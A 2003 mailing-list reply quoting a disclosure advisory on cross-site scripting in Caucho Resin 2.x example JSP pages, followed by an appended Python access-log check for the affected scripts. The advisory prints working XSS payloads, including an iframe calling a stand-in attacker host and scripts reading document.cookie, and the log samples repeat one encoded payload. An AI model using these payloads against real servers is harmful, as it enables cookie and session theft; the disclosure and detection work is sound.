From: jkuperus at planet.nl (jelmer)
Subject: Caucho Resin 2.x - Cross Site Scripting

Donny,

These are in the example applications, which any sane admin should disable
right away, much like caucho-status. These are basic procedures in setting up
a server.

--jelmer

----- Original Message -----
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting

> -----------------------------------------------------------------
> - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
> -= Caucho Resin =-
>
> Donnie Werner
> Oct 18, 2003
>
> Vulnerability(s):
> ----------------
> 1. XSS
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
> Description of product:
> -----------------------
> "Resin® is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
> VULNERABILITY / EXPLOIT
> ======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
> http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
> or
> <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
>
> the above is only an example, all cookie and session
> stealing Cross Site Scripting was possible.
>
> guestbook.jsp allows persistent XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
> Vendor Fix:
> -----------
> Versions 3.x don't have the examples included
>
> Vendor Contact:
> ---------------
> bugs@...cho.com
> Concurrent with this advisory
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@...labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
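
A log check for the point made in the reply above, added here as an example and not part of either message: it flags access-log requests to the example scripts named in the advisory, separating hits that only show the examples are still deployed from hits carrying HTML markup in a parameter. The Common Log Format layout, the sample lines, the /examples/session.jsp path and the parameter name x are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names the advisory lists as affected (guestbook.jsp is the stored case).
AFFECTED = {"env.jsp", "form.jsp", "session.jsp", "tictactoe.jsp", "guestbook.jsp"}
# Assumption: Common Log Format request and status fields.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Start of an HTML tag, closing tag or comment inside a parameter value.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (finding, script, [params carrying markup]) or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED:
        return None
    hits = [name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if MARKUP.search(fully_decode(value))]
    if hits:
        return ("markup-in-parameter", script, hits)
    # A 200 without markup still shows the example apps are deployed.
    if m.group("status") == "200":
        return ("examples-deployed", script, [])
    return None

# Constructed log lines (documentation addresses, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2003:12:40:01 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=4 HTTP/1.0" 200 812',
    '192.0.2.77 - - [19/Oct/2003:12:41:09 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=%3CSCRIPT%3Ealert(document.domain)%3B%3C/SCRIPT%3E HTTP/1.0" 200 901',
    '192.0.2.77 - - [19/Oct/2003:12:41:30 +0000] "GET /examples/session.jsp?x=%253Ciframe%2520src%253Dx%253E HTTP/1.0" 404 210',
    '192.0.2.10 - - [19/Oct/2003:12:42:00 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry))
```

Form submissions to guestbook.jsp sent as POST bodies do not appear in the request line, so this check only covers values passed in the query string.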